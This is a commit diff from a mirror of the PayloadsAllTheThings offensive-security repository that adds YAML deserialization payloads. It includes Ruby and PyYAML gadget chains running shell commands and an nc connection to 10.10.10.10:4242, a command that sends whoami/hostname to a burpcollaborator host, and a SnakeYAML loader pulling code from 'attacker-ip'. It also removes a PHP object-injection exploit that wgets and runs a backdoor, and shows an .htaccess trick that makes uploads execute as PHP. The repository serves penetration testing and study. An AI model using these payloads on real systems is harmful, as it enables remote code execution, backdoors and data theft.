mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-04 02:20:17 +00:00
YAML Deserialization
This commit is contained in:
parent
e677f07197
commit
267713c0fb
9 changed files with 162 additions and 69 deletions
3
.gitignore
vendored
3
.gitignore
vendored
|
@ -1,4 +1,3 @@
|
|||
BuildPDF/
|
||||
.vscode
|
||||
.todo
|
||||
AWS Amazon Lambda/
|
||||
.todo
|
|
@ -1,32 +0,0 @@
|
|||
<?php
|
||||
/*
|
||||
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
|
||||
|
||||
A simple PoC to exploit PHP Object Injections flaws and gain remote shell access.
|
||||
|
||||
Shouts to @jstnkndy @yappare for the assist!
|
||||
|
||||
NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
|
||||
*/
|
||||
|
||||
print "==============================================================================\r\n";
|
||||
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
|
||||
print "==============================================================================\r\n";
|
||||
print "[+] Generating serialized payload...[OK]\r\n";
|
||||
print "[+] Launching reverse listener...[OK]\r\n";
|
||||
system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
|
||||
|
||||
class PHPObjectInjection
|
||||
{
|
||||
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
|
||||
public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
|
||||
}
|
||||
|
||||
$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
|
||||
$url = $url . urlencode(serialize(new PHPObjectInjection));
|
||||
print "[+] Sending exploit...[OK]\r\n";
|
||||
print "[+] Dropping down to interactive shell...[OK]\r\n";
|
||||
print "==============================================================================\r\n";
|
||||
$response = file_get_contents("$url");
|
||||
|
||||
?>
|
19
Insecure Deserialization/Files/ruby-serialize.yaml
Normal file
19
Insecure Deserialization/Files/ruby-serialize.yaml
Normal file
|
@ -0,0 +1,19 @@
|
|||
---
|
||||
- !ruby/object:Gem::Installer
|
||||
i: x
|
||||
- !ruby/object:Gem::SpecFetcher
|
||||
i: y
|
||||
- !ruby/object:Gem::Requirement
|
||||
requirements:
|
||||
!ruby/object:Gem::Package::TarReader
|
||||
io: &1 !ruby/object:Net::BufferedIO
|
||||
io: &1 !ruby/object:Gem::Package::TarReader::Entry
|
||||
read: 0
|
||||
header: "abc"
|
||||
debug_output: &1 !ruby/object:Net::WriteAdapter
|
||||
socket: &1 !ruby/object:Gem::RequestSet
|
||||
sets: !ruby/object:Net::WriteAdapter
|
||||
socket: !ruby/module 'Kernel'
|
||||
method_id: :system
|
||||
git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'"
|
||||
method_id: :resolve
|
|
@ -11,7 +11,7 @@
|
|||
|
||||
## Exploit
|
||||
|
||||
[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
|
||||
[frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
|
||||
|
||||
```java
|
||||
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
|
||||
|
@ -20,37 +20,44 @@ java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > pay
|
|||
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
|
||||
```
|
||||
|
||||
payload | author | dependencies | impact (if not RCE)
|
||||
------|--------|------ |------
|
||||
BeanShell1 |@pwntester, @cschneider4711 |bsh:2.0b5
|
||||
C3P0 |@mbechler |c3p0:0.9.5.2, mchange-commons-java:0.2.11
|
||||
Clojure |@JackOfMostTrades |clojure:1.8.0
|
||||
CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
|
||||
CommonsCollections1 |@frohoff |commons-collections:3.1
|
||||
CommonsCollections2 |@frohoff |commons-collections4:4.0
|
||||
CommonsCollections3 |@frohoff |commons-collections:3.1
|
||||
CommonsCollections4 |@frohoff |commons-collections4:4.0
|
||||
CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
|
||||
CommonsCollections6 |@matthias_kaiser |commons-collections:3.1
|
||||
FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
|
||||
Groovy1 |@frohoff |groovy:2.3.9
|
||||
Hibernate1 |@mbechler|
|
||||
Hibernate2 |@mbechler|
|
||||
JBossInterceptors1 |@matthias_kaiser |javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
JRMPClient |@mbechler|
|
||||
JRMPListener |@mbechler|
|
||||
JSON1 |@mbechler |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
|
||||
JavassistWeld1 |@matthias_kaiser |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
Jdk7u21 |@frohoff|
|
||||
Jython1 |@pwntester, @cschneider4711 |jython-standalone:2.5.2
|
||||
MozillaRhino1 |@matthias_kaiser |js:1.7R2
|
||||
Myfaces1 |@mbechler|
|
||||
Myfaces2 |@mbechler|
|
||||
ROME |@mbechler |rome:1.0
|
||||
Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
|
||||
Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
|
||||
URLDNS |@gebl| | jre only vuln detect
|
||||
Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4
|
||||
```ps1
|
||||
Payload Authors Dependencies
|
||||
------- ------- ------------
|
||||
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
|
||||
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
|
||||
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
|
||||
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
|
||||
Clojure @JackOfMostTrades clojure:1.8.0
|
||||
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
|
||||
CommonsCollections1 @frohoff commons-collections:3.1
|
||||
CommonsCollections2 @frohoff commons-collections4:4.0
|
||||
CommonsCollections3 @frohoff commons-collections:3.1
|
||||
CommonsCollections4 @frohoff commons-collections4:4.0
|
||||
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
|
||||
CommonsCollections6 @matthias_kaiser commons-collections:3.1
|
||||
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
|
||||
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
|
||||
Groovy1 @frohoff groovy:2.3.9
|
||||
Hibernate1 @mbechler
|
||||
Hibernate2 @mbechler
|
||||
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
JRMPClient @mbechler
|
||||
JRMPListener @mbechler
|
||||
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
|
||||
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
Jdk7u21 @frohoff
|
||||
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
|
||||
MozillaRhino1 @matthias_kaiser js:1.7R2
|
||||
MozillaRhino2 @_tint0 js:1.7R2
|
||||
Myfaces1 @mbechler
|
||||
Myfaces2 @mbechler
|
||||
ROME @mbechler rome:1.0
|
||||
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
|
||||
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
|
||||
URLDNS @gebl
|
||||
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
|
||||
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
|
||||
```
|
||||
|
||||
## Burp extensions using ysoserial
|
||||
|
||||
|
@ -69,7 +76,8 @@ Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:
|
|||
- [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution
|
||||
|
||||
```java
|
||||
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
|
||||
$ java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
|
||||
$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389
|
||||
|
||||
where
|
||||
-a - generates/tests all payloads for that marshaller
|
||||
|
@ -101,10 +109,12 @@ Payload generators for the following marshallers are included:<br />
|
|||
## References
|
||||
|
||||
- [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
||||
- [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
|
||||
- [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau | Mar 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
|
||||
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
||||
- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
|
||||
- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
|
||||
- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
|
||||
- [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
|
||||
- [On Jackson CVEs: Don’t Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96)
|
||||
- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)
|
||||
- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)
|
||||
|
|
|
@ -8,6 +8,7 @@ Check the following sub-sections, located in other files :
|
|||
* [PHP (Object injection) : phpggc, ...](PHP.md)
|
||||
* [Ruby : universal rce gadget, ...](Ruby.md)
|
||||
* [Python : pickle, ...](Python.md)
|
||||
* [YAML : PyYAML, ...](YAML.md)
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -59,4 +59,5 @@ Universal gadget for ruby 2.x - 3.x.
|
|||
- [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
|
||||
- [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
|
||||
- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
|
||||
- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
|
||||
- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/)
|
||||
* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
|
89
Insecure Deserialization/YAML.md
Normal file
89
Insecure Deserialization/YAML.md
Normal file
|
@ -0,0 +1,89 @@
|
|||
# YAML Deserialization
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Exploit](#exploit)
|
||||
* [PyYAML](#pyyaml)
|
||||
* [ruamel.yaml](#ruamelyaml)
|
||||
* [Ruby](#ruby)
|
||||
* [SnakeYAML](#snakeyaml)
|
||||
* [References](#references)
|
||||
|
||||
## Tools
|
||||
|
||||
* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)
|
||||
* [artsploit/yaml-payload](https://github.com/artsploit/yaml-payload) - A tiny project for generating SnakeYAML deserialization payloads
|
||||
* [mbechler/marshalsec](https://github.com/mbechler/marshalsec)
|
||||
|
||||
## Exploit
|
||||
|
||||
### PyYAML
|
||||
|
||||
```yaml
|
||||
!!python/object/apply:time.sleep [10]
|
||||
!!python/object/apply:builtins.range [1, 10, 1]
|
||||
!!python/object/apply:os.system ["nc 10.10.10.10 4242"]
|
||||
!!python/object/apply:os.popen ["nc 10.10.10.10 4242"]
|
||||
!!python/object/new:subprocess [["ls","-ail"]]
|
||||
!!python/object/new:subprocess.check_output [["ls","-ail"]]
|
||||
```
|
||||
|
||||
```yaml
|
||||
!!python/object/apply:subprocess.Popen
|
||||
- ls
|
||||
```
|
||||
|
||||
```yaml
|
||||
!!python/object/new:str
|
||||
state: !!python/tuple
|
||||
- 'print(getattr(open("flag\x2etxt"), "read")())'
|
||||
- !!python/object/new:Warning
|
||||
state:
|
||||
update: !!python/name:exec
|
||||
```
|
||||
|
||||
## Ruamel.yaml
|
||||
|
||||
## Ruby
|
||||
|
||||
```ruby
|
||||
---
|
||||
- !ruby/object:Gem::Installer
|
||||
i: x
|
||||
- !ruby/object:Gem::SpecFetcher
|
||||
i: y
|
||||
- !ruby/object:Gem::Requirement
|
||||
requirements:
|
||||
!ruby/object:Gem::Package::TarReader
|
||||
io: &1 !ruby/object:Net::BufferedIO
|
||||
io: &1 !ruby/object:Gem::Package::TarReader::Entry
|
||||
read: 0
|
||||
header: "abc"
|
||||
debug_output: &1 !ruby/object:Net::WriteAdapter
|
||||
socket: &1 !ruby/object:Gem::RequestSet
|
||||
sets: !ruby/object:Net::WriteAdapter
|
||||
socket: !ruby/module 'Kernel'
|
||||
method_id: :system
|
||||
git_set: sleep 600
|
||||
method_id: :resolve
|
||||
```
|
||||
|
||||
## SnakeYAML
|
||||
|
||||
```yaml
|
||||
!!javax.script.ScriptEngineManager [
|
||||
!!java.net.URLClassLoader [[
|
||||
!!java.net.URL ["http://attacker-ip/"]
|
||||
]]
|
||||
]
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Python Yaml Deserialization - hacktricks.xyz][https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization]
|
||||
* [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13][https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf]
|
||||
* [PyYAML Documentation](https://pyyaml.org/wiki/PyYAMLDocumentation)
|
||||
* [Blind Remote Code Execution through YAML Deserialization - 09 JUNE 2021](https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/)
|
||||
* [[CVE-2019-20477]- 0Day YAML Deserialization Attack on PyYAML version <= 5.1.2 - @_j0lt](https://thej0lt.com/2020/06/21/cve-2019-20477-0day-yaml-deserialization-attack-on-pyyaml-version/)
|
|
@ -0,0 +1 @@
|
|||
AddType application/x-httpd-php .rce
|
|
@ -25,6 +25,11 @@ AddType application/x-httpd-php .htaccess
|
|||
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
|
||||
```
|
||||
|
||||
# .htaccess simple php
|
||||
|
||||
Upload an .htaccess with : `AddType application/x-httpd-php .rce`
|
||||
Then upload any file with `.rce` extension.
|
||||
|
||||
# .htaccess upload as image
|
||||
|
||||
If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.
|
||||
|
|
Loading…
Reference in a new issue